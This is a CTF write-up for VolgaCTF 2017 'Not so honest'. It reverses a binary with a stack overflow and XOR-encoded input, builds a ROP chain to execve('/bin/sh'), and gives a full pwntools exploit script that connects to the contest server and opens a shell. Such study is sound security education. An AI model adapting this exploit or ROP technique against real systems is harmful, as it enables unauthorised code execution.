Rating:
[writeup by @abiondo]
CTF: VolgaCTF 2017 Quals
Team: spritzers (from SPRITZ Research Group)
Task: exploits / Not so honest
Points: 350
This server application claims to give you the flag provided you give it your encryption key. Honestly. But where's the catch?
We have an ELF 64-bit Linux binary. checksec.sh
shows partial RELRO, stack canary, NX and no PIE.
If we run the binary without arguments, it shows the usage:
usage:
not_so_honest <flag_file> <key_file>
<flag_file> flag to give away
<key_file> key file
If we give it two files, it asks for a key to give us the flag. I started reversing the binary and noticed a stack overflow right away in main
:
char input_key_hex[4096];
...
scanf("%s", input_key_hex);
The input key is then hexdecoded and processed. Since there's a stack canary we'd need a leak, but I tried feeding it an input of something like 4500 A
s anyway. Let's look at the crash:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000401401 in ?? ()
(gdb) x/i $rip
=> 0x401401: retq
(gdb) x/xg $rsp
0x7fffffffc3b8: 0x04bfef148209ddea
Something funky is going on here. I expected an abort due to canary corruption, instead it's trying to jump to a corrupted return address, which should be prevented by the canary. In fact, 0x401401
is not in main
! So there's another function vulnerable to stack overflows that isn't protected by the canary. Another thing I notice is that the return address 0x04bfef148209ddea
, while it doesn't look anything like a valid address, also doesn't look anything like our input.
I start looking at the code around 0x401401
, which is poorly handled by IDA as it has some random bytes in between instructions that I have to manually fix. To make things quicker, I fire up qira
and trace the last write to the return address, which gets me to this loop:
.text:401383 loc_401383:
.text:401383 mov r14, [r9+r11] ; r14 = *((uint64_t *) (r9 + r11))
.text:401387 xor r14, [r10+r11] ; r14 ^= *((uint64_t *) (r10 + r11))
.text:40138B xor r14, [rdx+r11] ; r14 ^= *((uint64_t *) (rdx + r11))
.text:40138F mov [rsp+r11], r14 ; *((uint64_t *) (rsp + r11)) = r14
.text:401393 add r11, 8 ; r11 += 8
.text:401397 cmp r11, rcx
.text:40139A jl short loc_401383 ; while (r11 < rcx) repeat
It's encoding and copying input data to the stack. r11
is the offset, which starts at zero and is incremented by 8 every iteration (because it's writing 8 bytes at a time). rdx
points to the hexdecoded input buffer (in our case, {0xaa, 0xaa, ...}
). r9
points to some magic buffer at 0x602088
(in .data
). rdx
points to code at 0x401313
. rcx
is the size of the hexdecoded input buffer (half the input size), but it's capped at 2047
. This means it can write up to 2kB of data. The return address is overwritten at the iteration with r11
= 104, so we have ample space for our ROP chain.
The code at 0x401313
is obviously not going to change. The buffer at 0x602088
is pre-initialized in the binary and has some modifications done at runtime. The first 104 (!) bytes are zero and are not changed. Then it has:
0x2a8429e525bc3757
0x241b0b5573dca89a
0x9ae43ac798b2df95
I only cared about the first 256 bytes block, since it's more than enough for my ROP chain. With this knowledge we can generate an input that decodes exactly to what we want: we just need to XOR our desired result with the two QWORDs for the offset it's located at. To get to the return address we need an input with 104 * 2 = 208
hex digits before our XOR-encoded and then hexencoded address. Indeed it works, RIP control achieved!
The binary has NX enabled, so we need to build a ROP chain. There's a nice syscall
gadget, so we're going to call execve("/bin/sh", {NULL}, NULL)
. We need gadgets to set the syscall number (rax
) and the first three arguments (rdi
, rsi
, rdx
). We also need a write-what-where gadget for filename
and argv
. All but rdx
are easy:
POP_RAX = 0x401315 # pop rax; ret;
POP_RDI = 0x4014a3 # pop rdi; ret;
POP_RSI = 0x400816 # pop rsi; ret;
SYSCALL = 0x40135b # syscall; ret;
WWW_RDI_RAX = 0x40136a # mov qword ptr [rdi], rax; ret;
I couldn't find a gadget to set rdx
. We actually only need to zero it out. I tried division and multiplication instructions (which have side-effects on rdx
) without luck. Ironically, I found a way out by abusing the stack canary mitigation. Functions with this mitigation store the canary from fs:28h
in the stack between locals and the return address in their prologue. In the epilogue they compare the stack canary against the real canary from fs:28h
and, if they are not equal, abort execution without returning. The catch is how this check is done: the stack canary is loaded into a register, then the register is XORed with the canary from fs:28h
and the check fails if the register is not zero. This means that, after executing the function, that register will be zeroed. You can probably guess I found a function that used rdx
for the check and was very easy to call without significant side effects:
.text:400BE0 sub rsp, 18h
.text:400BE4 mov byte ptr [rdi+rsi], 80h
.text:400BE8 shr rsi, 3
.text:400BEC mov rax, fs:28h ; load real canary
.text:400BF5 mov [rsp+8], rax ; store canary on stack
.text:400BFA xor eax, eax
.text:400BFC mov rdx, [rsp+8] ; rdx = stack canary
.text:400C01 xor rdx, fs:28h ; rdx ^= real canary
.text:400C0A jnz short loc_400C15 ; != 0 -> check failed
.text:400C0C lea rax, [rsi+1]
.text:400C10 add rsp, 18h
.text:400C14 retn
.text:400C15 loc_400C15:
.text:400C15 call ___stack_chk_fail
All this function does is storing the byte 0x80
at the address rdi + rsi
, so we just need to make this point to some writable address. We have gadgets to set rdi
and rsi
, so it's not a problem. But we could also jump straight to 0x400bec
and avoid that. The stack pointer will be advanced by 24 bytes, which means we need as many bytes of junk in the chain. Setting rdi
and rsi
is 32 bytes, so let's go with 0x400bec
. The code will also corrupt rax
, but that's not a significant issue.
I built a straightforward chain (see exploit code for details) and got a shell on my machine. When connecting to the remote service, I was presented with a puzzle such as:
Solve a puzzle: find an x such that 26 last bits of SHA1(x) are set, len(x)==29 and x[:24]=='41c171a223545b5bc9e7b2a2'
I just bruteforced it with printable characters. At last, we have a shell:
$ cat flag.txt
VolgaCTF{ASLR_is_Usele$s_when_syscall_ret_is_in_B1n@ry}
Full exploit code (the encoding is based off the +104 offset, 256 bytes were more than enough):
#!/usr/bin/python2
from pwn import *
import hashlib
import itertools
import sys
DATA_STUFF = '561A5EB65B6C91842F343B815D114B155F50B5B10E0F2C41EA2F883E5E96F6DD1702F4B9B406BF7FB4F723FD36DA099BA89082F9635E538C46CC489F77B8E0A9A60453FFC99C3601DFE625EE69AD993ED6A0CDEFBA8A0F7D6BB57877B9356C8A5383396F133AD09C883BA6AB3BC9BDD677AC986B4CB11A81A5576C490FD343F357E3A34BA6956879DEC9C678ACE0B6E8AEAD4448F3F2DDBC13DE71C3A36B0B2096FB054055FB42864976DE0CCB27F07A556D7F009EA3AE71A731B1628A59195447F9AE023065CBFC2E07D413905460C7D75D2C124777F2809248818A40CC9D4BAA7AC092EEC7296175C25B56C6084C2FB6516196BD40E77C58968DB0F22EBE02'.decode('hex')
TEXT_STUFF = '415A41BB000000004F8B34194F33341A4E33341A4E89341C4983C3084939CB7CE778037901E9478A34194732341A4632341A4688341C49FFC34939CB7CE84989E24989FC4C8D2CF500000000E806000000E8A601400000488B04244883C01348890424C34831DB498B141CE8A3FDFFFF4989141C4883C3084C39EB7CEA78037901E94883C468C34989F44C8B0249B9882060000000000078037901E8E8F0FDFFFF78037901E8488B174D89CAE862FDFFFF49891424C3662E0F1F8400000000000F1F440000415741564189FF415541544C8D25BE09200055488D2DBE092000534989F64989D54C29E54883EC0848C1FD03E847F2FFFF4885ED742031DB0F1F84'.decode('hex')
context(arch='amd64', os='linux')
p = remote('not-so-honest.quals.2017.volgactf.ru', 45678)
p.recvuntil("x[:24]=='")
key_start = p.read(24)
print('[+] Bruteforcing key...')
alpha = [chr(i) for i in range(0x20, 0x7F + 1)]
key = None
for cand in itertools.product(alpha, repeat=5):
cand_key = key_start + ''.join(cand)
digest = hashlib.sha1(cand_key).digest()
if digest[-3:] == '\xff\xff\xff' and ord(digest[-4]) & 3 == 3:
key = cand_key
break
if key is None:
print('ERROR: no key')
sys.exit(1)
print('[+] Found key: ' + key)
p.sendline(key)
POP_RAX = p64(0x401315) # pop rax; ret;
POP_RDI = p64(0x4014a3) # pop rdi; ret;
POP_RSI = p64(0x400816) # pop rsi; ret;
SYSCALL = p64(0x40135b) # syscall; ret;
WWW_RDI_RAX = p64(0x40136a) # mov qword ptr [rdi], rax; ret;
ZERO_RDX = p64(0x400bec) # zero rdx; corrupt rax; add rsp, 24; ret;
W_ADDR = 0x602100 # @ .data
rop_www = lambda addr, val : POP_RDI + p64(addr) + POP_RAX + val + WWW_RDI_RAX
# write '/bin/sh\x00' to W_ADDR (filename)
rop = rop_www(W_ADDR, '/bin/sh\x00')
# write NULL to W_ADDR + 8 (argv[0])
rop += rop_www(W_ADDR + 8, p64(0))
# 1st arg (filename) = W_ADDR
rop += POP_RDI + p64(W_ADDR)
# 2nd arg (argv) = W_ADDR + 8
rop += POP_RSI + p64(W_ADDR + 8)
# 3rd arg (envp) = NULL
rop += ZERO_RDX + 'A'*24 # 24 bytes junk
# syscall number = 0x3b (execve)
rop += POP_RAX + p64(0x3b)
# execve("/bin/sh", {NULL}, NULL)
rop += SYSCALL
# junk to get to return address
buf = 'A' * 208
# encode chain
for i in range(0, len(rop), 8):
enc = u64(DATA_STUFF[i:i+8])
enc ^= 0x2a8429e525bc3757
enc ^= u64(TEXT_STUFF[i:i+8])
enc ^= u64(rop[i:i+8])
buf += p64(enc).encode('hex')
p.sendline(buf)
p.interactive()